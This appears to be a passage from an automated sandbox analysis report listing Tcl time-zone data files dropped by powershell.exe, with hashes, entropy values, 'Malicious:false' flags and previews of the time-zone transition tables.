                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                              MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                              SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                              SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                              SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                              MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                              SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                              SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                              SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                              Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                              MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                              SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                              SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                              SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                                              Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                              MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                              SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                              SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                              SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                              MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                              SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                              SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                              SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11124
                                                                                                                                                                                                                              Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                              MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                              SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                              SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                              SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8729
                                                                                                                                                                                                                              Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                              MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                              SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                              SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                              SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Havana) {.. {-9223372036854775808 -19768 0 LMT}.. {-2524501832 -19776 0 HMT}.. {-1402813824 -18000 0 CST}.. {-1311534000 -14400 1 CDT}.. {-1300996800 -18000 0 CST}.. {-933534000 -14400 1 CDT}.. {-925675200 -18000 0 CST}.. {-902084400 -14400 1 CDT}.. {-893620800 -18000 0 CST}.. {-870030000 -14400 1 CDT}.. {-862171200 -18000 0 CST}.. {-775681200 -14400 1 CDT}.. {-767822400 -18000 0 CST}.. {-744231600 -14400 1 CDT}.. {-736372800 -18000 0 CST}.. {-144702000 -14400 1 CDT}.. {-134251200 -18000 0 CST}.. {-113425200 -14400 1 CDT}.. {-102542400 -18000 0 CST}.. {-86295600 -14400 1 CDT}.. {-72907200 -18000 0 CST}.. {-54154800 -14400 1 CDT}.. {-41457600 -18000 0 CST}.. {-21495600 -14400 1 CDT}.. {-5774400 -18000 0 CST}.. {9954000 -14400 1 CDT}.. {25675200 -18000 0 CST}.. {41403600 -14400 1 CDT}.. {57729600 -18000 0 CST}.. {73458000 -14400 1 CD
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.351214377567366
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290e2mdH5NCtXwl3UXmMMmxL+voudQCvX70qKOV9kYNv:5Ie5k9WUQwuz/Vyu
                                                                                                                                                                                                                              MD5:E35A6C6E9DCF0CA34BFA2993CE445D6C
                                                                                                                                                                                                                              SHA1:4FF9C7EDBC73B1AE0815661571B7199379AF479C
                                                                                                                                                                                                                              SHA-256:C0A87DC3A474D25083F0CEA0C323D8E780D937453CAD23C98AF367D81AC2CA2D
                                                                                                                                                                                                                              SHA-512:56A728ABCD3EA91D2492E1331B3F76F31EF5675BCD95A692F9D94F91518B72569FD8DF1BB0515668E8A9BE0347018B391C65761D316903CA27C59883BBE0DE80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Hermosillo) {.. {-9223372036854775808 -26632 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {915174000 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7230
                                                                                                                                                                                                                              Entropy (8bit):3.882344472808608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nys0KHK1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:nyBKHkN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:7824B3F2D20F16A9DCC8E0F7DC45C1B8
                                                                                                                                                                                                                              SHA1:77014A0502DA1342EFA41B64C5613839B627354B
                                                                                                                                                                                                                              SHA-256:4B114545167326F066AB3A798180896B43AC6FDC3B80D32BCC917B5A4A2359EB
                                                                                                                                                                                                                              SHA-512:03F6A18C03E79E9177D16CD7AB75AC117197638370FA675BC2854A5A563021F865F3F0672B237B83098787AB9D419AC33D67F28324B1E25AD8560B5838F70807
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Indianapolis) {.. {-9223372036854775808 -20678 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-900259200 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8755
                                                                                                                                                                                                                              Entropy (8bit):3.8394539560522585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+q2KeNrdJ8SvAgahLi8hDlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:+FKUdJ8SvPaUqbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:8AF080A022DA0737E94742C50EAAC62E
                                                                                                                                                                                                                              SHA1:704F0565B53AA8A20F70B79A7958D4D07085E07A
                                                                                                                                                                                                                              SHA-256:F1253F5F3F5AACD1A5E1F4636DD4E083F4B2A8BD995CF3E684CDD384641849F1
                                                                                                                                                                                                                              SHA-512:26AAF6D24B2E2B60451E19A514533DFAEC74F01F9B1AEB9F86690669C14130D77AE1CBFB9FC9091E1CD1FC1CBC2799BB05026DB68768C3CCB960355C18D111ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Knox) {.. {-9223372036854775808 -20790 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-725824800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-447267600 -21600 0 CST}.. {-431539200 -18000 1 CDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7273
                                                                                                                                                                                                                              Entropy (8bit):3.8700915866109535
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7qvrv7+X1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7Kv7+bN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:C1A10440E6CCE4C5052E2510182D9AA7
                                                                                                                                                                                                                              SHA1:56D4F3CCA1245D626BADA74CF3F6BAE8034BF58D
                                                                                                                                                                                                                              SHA-256:675162381639598E7100E90663D42780F8EE1CB62BD6DA5B948B494F98C02FE3
                                                                                                                                                                                                                              SHA-512:96B71472AD38ECFC589F935D9F5F1C8D42C8E942D8772FB6A77F9B9C0E2BD7A07FA61729E57EC02356121518E33797A784679F8DED2FCA3FC79F5C114783DD57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Marengo) {.. {-9223372036854775808 -20723 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-599594400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7611
                                                                                                                                                                                                                              Entropy (8bit):3.87971256165061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TqervJ8SUklggahyBRP0HY2iU7KKdFL6Aa2K4gSLf8e:TpvJ8SUklvaQN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A86042668CD478AFFC05D3383EDEE8FF
                                                                                                                                                                                                                              SHA1:6476526F94A247C0ECF3B2813F2C5A4FB93E457E
                                                                                                                                                                                                                              SHA-256:23B8FA75CE0A9555DFD84549723A12679FF7FC5FAA58E4B745BA3C547071FF53
                                                                                                                                                                                                                              SHA-512:07A5487A087108E6D6E88580865885CA6243EF04BE8263FC913F38CADB8EA016386E8BBAD39F65FD081F1A2F14316FEAF008855E9CF2019B169D9511916AFF67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Petersburg) {.. {-9223372036854775808 -20947 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-473364000 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 1 CD
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7100
                                                                                                                                                                                                                              Entropy (8bit):3.8613085681914607
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:yqxrvJ8SUklLgzNA604qSScBgN+4ctDzIVQ/c/3hNxTh:yUvJ8SUkl8BA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:E7FE9B7CFBC6505C446056967DEBC87B
                                                                                                                                                                                                                              SHA1:81ADAD89F040F62E87D2F26D1D98B3E52710F695
                                                                                                                                                                                                                              SHA-256:D368123DB703B55244700876906775837D408C274C5A5801D80B77EADB6D5853
                                                                                                                                                                                                                              SHA-512:9C0746DE18C80B548AA443D59BB9971BDC304975717C5FCDEBDE72828ACF408FA1D687F87C42E7B8D6D0284C9F792EA236BF79C815947BE773D07364B630AC99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Tell_City) {.. {-9223372036854775808 -20823 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 0 EST
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6563
                                                                                                                                                                                                                              Entropy (8bit):3.866646181493734
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:juqv01BRP0HY2iU7KKdFL6Aa2K4gSLf8e:CoKN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2CCFC3980C321ED8A852759C0BCCB12C
                                                                                                                                                                                                                              SHA1:A8BFE02E4E71B28EF8E284E808F6EDE7C231F8FF
                                                                                                                                                                                                                              SHA-256:0623233AA39A1A82038A56DF255ADF49E648777375B8499491C8897EBEA1CDF1
                                                                                                                                                                                                                              SHA-512:A4C77689BC9BF871C756D05BAC4157F0FD324D10AC7D15F3543344C6F8C7FC9218AB7ADFBCE70C8ECCDD6EC15FD7960503FC7A8223FECE6D4227BF0BB04190C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vevay) {.. {-9223372036854775808 -20416 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-495043200 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {94712400 -18000 0 EST}.. {1136091600 -18000 0 EST}.. {1143961200 -14400 1 EDT}.. {1162101600 -18000 0 EST}.. {1173596400 -14400 1 EDT}.. {1194156000 -18000 0 EST}.. {1205046000 -14400 1 EDT}.. {1225605600 -18000 0 EST}.. {1236495600 -14400 1 EDT}.. {1257055200 -18000 0 EST}.. {1268550000 -144
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7226
                                                                                                                                                                                                                              Entropy (8bit):3.879195938909716
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Vq8rdJ5UklpRBRP0HY2iU7KKdFL6Aa2K4gSLf8e:VbdJ5Uklp/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:56D1930F5FAE2456DEC6C9AB1B0233E1
                                                                                                                                                                                                                              SHA1:F6ED52EF769DF2C015C181BCFF3DC0E24497C768
                                                                                                                                                                                                                              SHA-256:B8452B6AA739A78AC6D03806463B03D4175639593E19FAA3CA4B0D0FB77F18C9
                                                                                                                                                                                                                              SHA-512:AFCFF383DB441DA9154B639A88700D0604F487A20E830146B14061E485A991AD8DC279AF8C0C2329265CF14C901207B9058157FAA1C039082EB7630916834156
                                                                                                                                                                                                                              Malicious:false
